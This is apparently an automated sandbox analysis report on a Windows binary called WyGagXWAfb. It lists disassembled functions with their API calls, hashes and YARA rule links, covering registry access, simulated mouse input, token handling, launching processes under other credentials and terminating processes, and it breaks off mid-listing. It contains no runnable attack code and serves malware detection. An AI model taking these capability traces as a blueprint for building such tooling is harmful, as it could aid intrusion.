API String ID: 3489934621-340411864
Opcode ID: 03aafbcb46c4317579aa9cc0ca5ed0d5dda3db8f97c7c0895b0a7361eb5ca7a4
Instruction ID: 56404f840e8cec72297646be16b3f70f70204be84ec17fc3efac17ee66fa6a56
Opcode Fuzzy Hash: 03aafbcb46c4317579aa9cc0ca5ed0d5dda3db8f97c7c0895b0a7361eb5ca7a4
Instruction Fuzzy Hash: E6E0E5B0691301ABEB205BB4ED19B247AE4AB21716F604476B455F70B0EFB554918E04

Function 00B3429E Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00B341B8), ref: 00B342B8
GetProcAddress.KERNEL32(00000000), ref: 00B342BF
EncodePointer.KERNEL32(00000000), ref: 00B342CA
DecodePointer.KERNEL32(00B341B8), ref: 00B342E5

Strings

RoUninitialize, xrefs: 00B342A7
combase.dll, xrefs: 00B342B3

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
String ID: RoUninitialize$combase.dll
API String ID: 3489934621-2819208100
Opcode ID: e25feb2fd95e3fbac91926d12921c007b24f6c7466c85f7c6fac459312101425
Instruction ID: 31adaa5bd37dcddf55203677b03276c067e3a95abe66720bc98387506e5c08fb
Opcode Fuzzy Hash: e25feb2fd95e3fbac91926d12921c007b24f6c7466c85f7c6fac459312101425
Instruction Fuzzy Hash: EBE0B678596312ABEB109B64EF1DB157FE4BB25752F204076F011F30B0DFB49584CA18

Function 00B7675A Relevance: 9.2, APIs: 6, Instructions: 205COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00B768AD
_memmove.LIBCMT ref: 00B767E8

Part of subcall function 00B19997: __itow.LIBCMT ref: 00B199C2
Part of subcall function 00B19997: __swprintf.LIBCMT ref: 00B19A0C

_memmove.LIBCMT ref: 00B7685B
_memmove.LIBCMT ref: 00B76942
_memmove.LIBCMT ref: 00B7695B
_memmove.LIBCMT ref: 00B76977

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: _memmove$__itow__swprintf
String ID:
API String ID: 3253778849-0
Opcode ID: 82d56cf056c06c541bf937ec26719667f570c9623c10b6150f60c640c25f86ac
Instruction ID: afeb862f23703af5b5f2ebcb88b812c7887d25fb1d00a5cf63aa308ddb20230f
Opcode Fuzzy Hash: 82d56cf056c06c541bf937ec26719667f570c9623c10b6150f60c640c25f86ac
Instruction Fuzzy Hash: 6161E13050469AABCF15EF24CC91EFE37E8EF44308F448599F96A5B192DB30AD41CB51

Function 00B9046F Relevance: 9.2, APIs: 6, Instructions: 167registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00B17F41: _memmove.LIBCMT ref: 00B17F82

Part of subcall function 00B910A5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00B90038,?,?), ref: 00B910BC

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00B90548
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00B90588
RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00B905AB
RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00B905D4
RegCloseKey.ADVAPI32(?,?,00000000), ref: 00B90617
RegCloseKey.ADVAPI32(00000000), ref: 00B90624

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
String ID:
API String ID: 4046560759-0
Opcode ID: e3eee9c3dd6dc60d9757f70f7589e7f71aa6152871d7975d7825f418267d8853
Instruction ID: 9b6a539461695d330803131eb9aee1b2271399ae21032e441951c2731022e055
Opcode Fuzzy Hash: e3eee9c3dd6dc60d9757f70f7589e7f71aa6152871d7975d7825f418267d8853
Instruction Fuzzy Hash: BF516931218241AFCB14EF64C885EAFBBE9FF88714F4449ADF495872A1DB31E944CB52

Function 00B95A20 Relevance: 9.2, APIs: 6, Instructions: 160windowCOMMON

Download Yara Rule

APIs

GetMenu.USER32(?), ref: 00B95A82
GetMenuItemCount.USER32(00000000), ref: 00B95AB9
GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 00B95AE1
GetMenuItemID.USER32(?,?), ref: 00B95B50
GetSubMenu.USER32(?,?), ref: 00B95B5E
PostMessageW.USER32(?,00000111,?,00000000), ref: 00B95BAF

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: Menu$Item$CountMessagePostString
String ID:
API String ID: 650687236-0
Opcode ID: 03ab62f39bb59df05a86b1c82caf8359daab4b3a27c5ef13c30337270868fa95
Instruction ID: 644df8acec50eae5dc9afc7ca8791335ee2503d1ba6429ea31b2cc909143ed6d
Opcode Fuzzy Hash: 03ab62f39bb59df05a86b1c82caf8359daab4b3a27c5ef13c30337270868fa95
Instruction Fuzzy Hash: B3517E31A40615EFCF21EFA4C995AAEB7F5EF48320F1044A9E915B7351CB70AE41CB94

Function 00B6F3DD Relevance: 9.2, APIs: 6, Instructions: 159COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00B6F3F7
VariantClear.OLEAUT32(00000013), ref: 00B6F469
VariantClear.OLEAUT32(00000000), ref: 00B6F4C4
_memmove.LIBCMT ref: 00B6F4EE
VariantClear.OLEAUT32(?), ref: 00B6F53B
VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00B6F569

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: Variant$Clear$ChangeInitType_memmove
String ID:
API String ID: 1101466143-0
Opcode ID: e568038d98a8cc82a9ed1f1b29de87c7073bfee3f2e3245f8e0ee2176b29ea4a
Instruction ID: bbf38e8431c6c0297b363839bb76deb2a9cee8c34e237c6fa8aaba830164b218
Opcode Fuzzy Hash: e568038d98a8cc82a9ed1f1b29de87c7073bfee3f2e3245f8e0ee2176b29ea4a
Instruction Fuzzy Hash: C9514CB5A0020ADFCB14CF58D884AAAB7F8FF4C354B15856AE959DB310D734E911CFA0

Function 00B726F9 Relevance: 9.1, APIs: 6, Instructions: 138windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00B72747
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00B72792
IsMenu.USER32(00000000), ref: 00B727B2
CreatePopupMenu.USER32 ref: 00B727E6
GetMenuItemCount.USER32(000000FF), ref: 00B72844
InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00B72875

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: Menu$Item$CountCreateInfoInsertPopup_memset
String ID:
API String ID: 3311875123-0
Opcode ID: b05490bacba48807c33bd3bcc191d54f86cb45a4d779038bd905d234e260c979
Instruction ID: f33a9088f1c4e6f4205f6fd6fc3c5ab0d08f4daf437205243815e9b6495d84b0
Opcode Fuzzy Hash: b05490bacba48807c33bd3bcc191d54f86cb45a4d779038bd905d234e260c979
Instruction Fuzzy Hash: 1151A270A00206DFDF25CF68C988BADBBF4EF44314F1082A9E4299B291D7718E44CB52

Function 00B11765 Relevance: 9.1, APIs: 6, Instructions: 113COMMON

Download Yara Rule

APIs

Part of subcall function 00B12612: GetWindowLongW.USER32(?,000000EB), ref: 00B12623

BeginPaint.USER32(?,?,?,?,?,?), ref: 00B1179A
GetWindowRect.USER32(?,?), ref: 00B117FE
ScreenToClient.USER32(?,?), ref: 00B1181B
SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00B1182C
EndPaint.USER32(?,?), ref: 00B11876

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: PaintWindow$BeginClientLongRectScreenViewport
String ID:
API String ID: 1827037458-0
Opcode ID: 0e629935b523840022d083b2b76ddc2b3911254c45950c7801fad812af332286
Instruction ID: d123f8ad7b8eacac8cfca2690f06969653f58bded58ffefcdb76e8f5f1a21485
Opcode Fuzzy Hash: 0e629935b523840022d083b2b76ddc2b3911254c45950c7801fad812af332286
Instruction Fuzzy Hash: 584192711043019FD710DF28DC84FB67BF8EB49724F144AAAF694C72A1DB319985DB61

Function 00B9B958 Relevance: 9.1, APIs: 6, Instructions: 109windowCOMMON

Download Yara Rule

APIs

ShowWindow.USER32(00BD67B0,00000000,010B6368,?,?,00BD67B0,?,00B9B862,?,?), ref: 00B9B9CC
EnableWindow.USER32(00000000,00000000), ref: 00B9B9F0
ShowWindow.USER32(00BD67B0,00000000,010B6368,?,?,00BD67B0,?,00B9B862,?,?), ref: 00B9BA50
ShowWindow.USER32(00000000,00000004,?,00B9B862,?,?), ref: 00B9BA62
EnableWindow.USER32(00000000,00000001), ref: 00B9BA86
SendMessageW.USER32(?,0000130C,?,00000000), ref: 00B9BAA9

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: Window$Show$Enable$MessageSend
String ID:
API String ID: 642888154-0
Opcode ID: 4c26ceb374f9c63661a8a56269d4d8297deeace258dd5f28e1daed74ac67a9ee
Instruction ID: 13270691bdd99f02e6c0d08bb3926e6fe3366339f4ce30c6d8544a0425316076
Opcode Fuzzy Hash: 4c26ceb374f9c63661a8a56269d4d8297deeace258dd5f28e1daed74ac67a9ee
Instruction Fuzzy Hash: 6A413034600241AFDF25CF58E689FA57BE1FB05314F1882F9EA488F6A2CB35AC45CB51

Function 00B873B1 Relevance: 9.1, APIs: 6, Instructions: 97COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(?,?,?,?,?,?,00B85134,?,?,00000000,00000001), ref: 00B873BF

Part of subcall function 00B83C94: GetWindowRect.USER32(?,?), ref: 00B83CA7

GetDesktopWindow.USER32 ref: 00B873E9
GetWindowRect.USER32(00000000), ref: 00B873F0
mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 00B87422

Part of subcall function 00B754E6: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00B7555E

GetCursorPos.USER32(?), ref: 00B8744E
mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00B874AC

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
String ID:
API String ID: 4137160315-0
Opcode ID: e5e16fe7ad7e6f9e75c2a2bb1c989c60d7badeaef6d0172865e9d92d7e31d330
Instruction ID: c28d1f2ff37d6c6356bd4f8e6f9f8bd9c7892d64570cb4998b407541afd9ecbb
Opcode Fuzzy Hash: e5e16fe7ad7e6f9e75c2a2bb1c989c60d7badeaef6d0172865e9d92d7e31d330
Instruction Fuzzy Hash: 7131F432508306AFC720EF14D849E5BBBE9FF88314F10091AF488D7291CB70E948CB92

Function 00B68D5B Relevance: 9.1, APIs: 6, Instructions: 69memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00B685F1: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00B68608
Part of subcall function 00B685F1: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00B68612
Part of subcall function 00B685F1: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00B68621
Part of subcall function 00B685F1: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00B68628
Part of subcall function 00B685F1: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00B6863E

GetLengthSid.ADVAPI32(?,00000000,00B68977), ref: 00B68DAC
GetProcessHeap.KERNEL32(00000008,00000000), ref: 00B68DB8
HeapAlloc.KERNEL32(00000000), ref: 00B68DBF
CopySid.ADVAPI32(00000000,00000000,?), ref: 00B68DD8
GetProcessHeap.KERNEL32(00000000,00000000,00B68977), ref: 00B68DEC
HeapFree.KERNEL32(00000000), ref: 00B68DF3

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
String ID:
API String ID: 3008561057-0
Opcode ID: f40f499cc37af8dc137327b23f8e12d11d3e2793c14b7112f5cfd79f12fc30d7
Instruction ID: e03f38143e6ef9576a9b990c5d3002cc6a27ea67845fb9642295775d2f6f4b8a
Opcode Fuzzy Hash: f40f499cc37af8dc137327b23f8e12d11d3e2793c14b7112f5cfd79f12fc30d7
Instruction Fuzzy Hash: CD11B171500605FFDF109F64CD09BBE77A9EF55325F1042AEE945E7260DB399900CBA0

Function 00B68AF9 Relevance: 9.1, APIs: 6, Instructions: 65processCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00B68B2A
OpenProcessToken.ADVAPI32(00000000), ref: 00B68B31
CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00B68B40
CloseHandle.KERNEL32(00000004), ref: 00B68B4B
CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00B68B7A
DestroyEnvironmentBlock.USERENV(00000000), ref: 00B68B8E

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
String ID:
API String ID: 1413079979-0
Opcode ID: 870378bee88901568c8f85a19864e6dbc96afe7ecbf9439903b9fbb0638946ea
Instruction ID: 1ea7f777dea4c0a84e548691485317d8bfc1f33eeb8e347e10713a8ab860c56d
Opcode Fuzzy Hash: 870378bee88901568c8f85a19864e6dbc96afe7ecbf9439903b9fbb0638946ea
Instruction Fuzzy Hash: 67115EB250020AABDF018FA4DD49FEA7BE9EF08314F084165FE04A2160CB768D649B60

Function 00B9C19A Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

Part of subcall function 00B112F3: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00B1134D
Part of subcall function 00B112F3: SelectObject.GDI32(?,00000000), ref: 00B1135C
Part of subcall function 00B112F3: BeginPath.GDI32(?), ref: 00B11373
Part of subcall function 00B112F3: SelectObject.GDI32(?,00000000), ref: 00B1139C

MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 00B9C1C4
LineTo.GDI32(00000000,00000003,?), ref: 00B9C1D8
MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 00B9C1E6
LineTo.GDI32(00000000,00000000,?), ref: 00B9C1F6
EndPath.GDI32(00000000), ref: 00B9C206
StrokePath.GDI32(00000000), ref: 00B9C216

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: Path$LineMoveObjectSelect$BeginCreateStroke
String ID:
API String ID: 43455801-0
Opcode ID: e9eb95731cd8ffee39b19dcb25274e3c1ed00b6f22aadd78d39ad9a18b0b38af
Instruction ID: 72e430b7f4b95b5afb514ac8932cacc6b9aa36f0523c1d9217568e56a8d3d898
Opcode Fuzzy Hash: e9eb95731cd8ffee39b19dcb25274e3c1ed00b6f22aadd78d39ad9a18b0b38af
Instruction Fuzzy Hash: 61111B7640010DBFDF119F94DC89EEA7FADEB08364F048062BA189A161DB729D55DBA0

Function 00B303A2 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON

Download Yara Rule

APIs

MapVirtualKeyW.USER32(0000005B,00000000), ref: 00B303D3
MapVirtualKeyW.USER32(00000010,00000000), ref: 00B303DB
MapVirtualKeyW.USER32(000000A0,00000000), ref: 00B303E6
MapVirtualKeyW.USER32(000000A1,00000000), ref: 00B303F1
MapVirtualKeyW.USER32(00000011,00000000), ref: 00B303F9
MapVirtualKeyW.USER32(00000012,00000000), ref: 00B30401

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: Virtual
String ID:
API String ID: 4278518827-0
Opcode ID: d9fbbc8317a748fbe18eef61f064987fd6ef7b5e3e674c8621c190b913e8ee07
Instruction ID: 579846c7b6d75cc3a2af45b799d1601c47ecbe8a52c0834287ab264eeb577916
Opcode Fuzzy Hash: d9fbbc8317a748fbe18eef61f064987fd6ef7b5e3e674c8621c190b913e8ee07
Instruction Fuzzy Hash: C5016CB090175A7DE3008F5A8C85B52FFB8FF19354F00411BA15C87941C7F5A864CBE5

Function 00B7568B Relevance: 9.0, APIs: 6, Instructions: 43windowtimethreadCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00B7569B
SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00B756B1
GetWindowThreadProcessId.USER32(?,?), ref: 00B756C0
OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00B756CF
TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00B756D9
CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00B756E0

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
String ID:
API String ID: 839392675-0
Opcode ID: 65a5f4d9518ef0444b71414d488e9a3116afcb0f18eb7eeddaac501c10a7cdfa
Instruction ID: ffcb927b09904d06c1dd081120c0b7e44d403faae154c598018d4d001573d4dd
Opcode Fuzzy Hash: 65a5f4d9518ef0444b71414d488e9a3116afcb0f18eb7eeddaac501c10a7cdfa
Instruction Fuzzy Hash: 24F01232141159BBD7215BA29D0DEBF7A7CEBC6B21F00016AF904D20519AA15A01C6B5

Function 00B774D2 Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,?), ref: 00B774E5
EnterCriticalSection.KERNEL32(?,?,00B21044,?,?), ref: 00B774F6
TerminateThread.KERNEL32(00000000,000001F6,?,00B21044,?,?), ref: 00B77503
WaitForSingleObject.KERNEL32(00000000,000003E8,?,00B21044,?,?), ref: 00B77510

Part of subcall function 00B76ED7: CloseHandle.KERNEL32(00000000,?,00B7751D,?,00B21044,?,?), ref: 00B76EE1

InterlockedExchange.KERNEL32(?,000001F6), ref: 00B77523
LeaveCriticalSection.KERNEL32(?,?,00B21044,?,?), ref: 00B7752A

Memory Dump Source

Source File: 00000000.00000002.1704405412.0000000000B11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.1704375029.0000000000B10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000B9F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704493701.0000000000BC5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704578371.0000000000BCF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1704601380.0000000000BD8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_WyGagXWAfb.jbxd

Similarity

API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
String ID:
API String ID: 3495660284-0
Opcode ID: 46bff60ea2e12a1eb9d47ce57daab01bd1c9a87cd0b9693532f9713e7f5e1b49
Instruction ID: 91a053bf01866a1a323533235e8b428d83d6a07bd9f388a2ccc04f5a82c1a292
Opcode Fuzzy Hash: 46bff60ea2e12a1eb9d47ce57daab01bd1c9a87cd0b9693532f9713e7f5e1b49
Instruction Fuzzy Hash: 87F03A3A140613ABDB111B64EE88AEA776AEF45322B100573F206E20B0CF756811CBA0

Function 00B68E74 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 00B68E7F
UnloadUserProfile.USERENV(?,?), ref: 00B68E8B
